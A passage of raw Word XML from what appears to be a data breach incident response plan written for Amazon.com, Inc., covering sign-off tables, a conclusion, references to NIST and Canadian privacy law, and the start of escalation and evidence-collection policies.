        <w:t xml:space="preserve">The GDPR requires organizations to notify regulators and affected customers of a data breach within 72 hours of discovery (Office of the Privacy Commissioner of Canada, 2018)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Engage third-party forensic teams for analysis.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Conduct a public briefing after containment.</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4320"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070c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br/>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Approvals</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Responsible Party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Responsibility for the security of company and customer information resides with the following Responsible Party:</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053"/>
        <w:gridCol w:w="2968"/>
        <w:gridCol w:w="1168"/>
        <w:gridCol w:w="1828"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="510"/>
        </w:trPr>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205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Responsible Party Name and Title</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296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Responsible Party Signature</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16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Version</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82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Date</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5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0"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">John Smith</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9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1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0"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">3.2</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0"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">21/11/2024</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>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205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29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116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18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Responsible Party has reviewed the Incident Response Plan and delegates the responsibility for mitigating harm to the organization to the Incident Handler.</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During times when a high or critical cyber security incident is underway this responsibility is entrusted to the Incident Handler or their delegate.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="139"/>
        <w:pBdr>
          <w:top w:val="single" w:color="cccccc" w:sz="24" w:space="0"/>
          <w:left w:val="single" w:color="cccccc" w:sz="24" w:space="0"/>
          <w:bottom w:val="single" w:color="cccccc" w:sz="24" w:space="0"/>
          <w:right w:val="single" w:color="cccccc" w:sz="24" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="cccccc" w:fill="cccccc"/>
        <w:spacing w:after="0" w:before="100" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Handler</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Incident Handler has reviewed the Security Incident Response Plan and acknowledges that, when a high or critical cyber security incident is underway, responsibility for managing the incident is entrusted to the Incident Handler or their delegate.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The Incident Handler or their delegate is expected to handle the incident in a way that mitigates further exposure of the organization. The incident will be handled according to process including identification, containment, eradication, recovery, and less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ons learned.</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008"/>
        <w:gridCol w:w="3073"/>
        <w:gridCol w:w="1033"/>
        <w:gridCol w:w="1888"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="510"/>
        </w:trPr>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200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Incident Handler Name and Title</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Incident Handler Signature</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033"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Version</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="000000" w:fill="000000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="44546a" w:sz="5" w:space="0"/>
              <w:left w:val="single" w:color="44546a" w:sz="5" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:right w:val="single" w:color="44546a" w:sz="5" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1888" w:type="dxa"/>
            <w:vAlign w:val="top"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
                <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
                <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
                <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="000000" w:fill="000000"/>
              <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>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20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b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">John Smith</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03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0"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">3.2</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:left w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:bottom w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:right w:val="single" w:color="000000" w:sz="5" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="188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0"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">11/21/2024</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>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20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307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103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c>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="5" w:space="0"/>
              <w:left w:val="single" w:color="44546a" w:sz="5" w:space="0"/>
              <w:bottom w:val="single" w:color="44546a" w:sz="5" w:space="0"/>
              <w:right w:val="single" w:color="44546a" w:sz="5" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="0" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="188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 </w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Conclusion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Amazon's Data Breach Incident Response Plan adheres to NIST frameworks to deliver swift, effective breach management while minimizing operational disruption. The plan is reinforced by an integrated policy architecture that enables decisive incident respons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">e through clearly defined protocols.</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Core policies driving our response framework include:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Incident Escalation Protocol</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Data Collection Guidelines</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Strategic Communications Framework</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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System Recovery Procedures</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Acceptable Use Standards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i/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident response frameworks typically include detection, containment, analysis, recovery, and reporting protocols (NIST, 2012).</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Supporting policies encompass Employee Training Requirements, Incident Reporting Protocols, Access Control Standards, and Data Breach Notification Procedures. This comprehensive policy suite ensures:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Clear accountability and role delegation</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Standardized communication channels</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Streamlined reporting mechanisms</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Risk-appropriate response protocols</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240" w:line="397" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Our integrated policy framework empowers authorized response actions while maintaining stringent compliance with regulatory requirements throughout the incident lifecycle. This strategic approach strengthens our security posture against data breaches and p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">reserves business continuity through structured threat detection, response, and mitigation measures.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Style w:val="138"/>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="24" w:space="0"/>
          <w:left w:val="single" w:color="000000" w:sz="24" w:space="0"/>
          <w:bottom w:val="single" w:color="000000" w:sz="24" w:space="0"/>
          <w:right w:val="single" w:color="000000" w:sz="24" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="000000" w:fill="000000"/>
        <w:spacing w:after="0" w:before="100" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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National Institute of Standards and Technology. (2012). Computer security incident handling guide (Special Publication 800-61 Revision 2). U.S. Department of Commerce. </w:t>
      </w:r>
      <w:hyperlink r:id="rId81" w:tooltip="http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf</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Office of the Privacy Commissioner of Canada. (2018). PIPEDA: What you need to know about mandatory reporting of breaches of security safeguards. Government of Canada. </w:t>
      </w:r>
      <w:hyperlink r:id="rId82" w:tooltip="https://www.priv.gc.ca/en/privacy-topics/privacy-breaches/respond-to-a-privacy-breach-at-yourbusiness/gd_pb_201810/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.priv.gc.ca/en/privacy-topics/privacy-breaches/respond-to-a-privacy-breach-at-yourbusiness/gd_pb_201810/</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Office of the Privacy Commissioner of Canada. (2023). The Personal Information Protection and Electronic Documents Act (PIPEDA). Government of Canada. </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:tooltip="https://www.priv.gc.ca/en/privacy-topics/privacy-laws-in-canada/the-personal-information-protection-and-electronicdocuments-act-pipeda/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.priv.gc.ca/en/privacy-topics/privacy-laws-in-canada/the-personal-information-protection-and-electronicdocuments-act-pipeda/</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Government of Canada. (2024). Canada's Anti-Spam Legislation (CASL). Canadian Radio-television and Telecommunications Commission. </w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:tooltip="https://www.fightspam.gc.ca/eic/site/030.nsf/eng/home" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.fightspam.gc.ca/eic/site/030.nsf/eng/home</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SANS Institute. (2024). Incident handling forms. SANS Digital Forensics and Incident Response. </w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:tooltip="https://www.sans.org/score/incident-forms" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.sans.org/score/incident-forms</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SANS Institute. (2023). Reading room: Incident response whitepapers. SANS Digital Forensics and Incident Response. </w:t>
      </w:r>
      <w:hyperlink r:id="rId86" w:tooltip="https://www.sans.org/reading-room/whitepapers/incident" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.sans.org/reading-room/whitepapers/incident</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SANS Institute. (2024). Incident handler's handbook. SANS Digital Forensics and Incident Response. </w:t>
      </w:r>
      <w:hyperlink r:id="rId87" w:tooltip="https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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SANS Institute. (2024). GIAC certifications - Incident handler's handbook. SANS Digital Forensics and Incident Response. </w:t>
      </w:r>
      <w:hyperlink r:id="rId88" w:tooltip="https://sansorg.egnyte.com/dl/6Btqoa63at/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://sansorg.egnyte.com/dl/6Btqoa63at/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="36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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Breach Incident Response Plan for Amazon.com, Inc Policy Set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document includes detailed policies for managing data breach incidents, covering purpose, scope, importance, security requirements, procedures, playbook linkage, and consequences of non-compliance. These policies are designed to ensure effective breac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">h management while maintaining compliance and organizational integrity.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1. Incident Escalation Policy</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0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ensure timely escalation of data breaches to minimize impact and enable swift containment and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">resolution.</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0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Applies to all Amazon.com, Inc. systems, networks, and personnel, including contractors and third-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">party vendors with access to sensitive data.</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0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Importance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Rapid escalation prevents further compromise, reduces legal exposure, and limits financial </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">and reputational damage.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Data Security &amp; Breach Requirements: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Clearly define escalation thresholds (e.g., breach affecting more than 1,000 records triggers critical status).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Notify the Cyber Security Incident Response Team (CSIRT) immediately upon detection of unauthorized data access.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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Engage legal counsel for all escalated breaches.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Inform senior executives if critical systems or customer data are compromised.</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Maintain an escalation flowchart to guide incident response teams.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Ensure compliance with GDPR, PIPEDA, and similar laws during escalations.</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Verify involvement of payment providers when financial data is affected.</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Notify external forensic teams for breaches requiring third-party expertise.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Escalate incidents to regulators when legally required.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Log all escalation decisions for accountability.</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720" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Activities:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Use monitoring tools (e.g., SIEM) to detect anomalies.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Automatically notify CSIRT for incidents flagged as critical or high severity.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Inform senior executives and legal counsel within 24 hours.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Frequency: Triggered per incident.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Document the breach's scope, initial assessment, and escalation actions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Playbook Linkage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Used in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> phase for decision-making as well as aligned with the Preparation and Detectio’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ences of Non-Compliance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Failure to escalate could result in prolonged breaches, regulatory fines, and reputational damage.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References:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST SP 800-61r2.</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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Collection Policy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Purpose:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Define procedures for collecting evidence during a breach to support legal, regulatory, and forensic requirements.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Scope:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Covers all digital and physical evidence related to a data breach, including logs, emails, and compromised systems.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Importance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
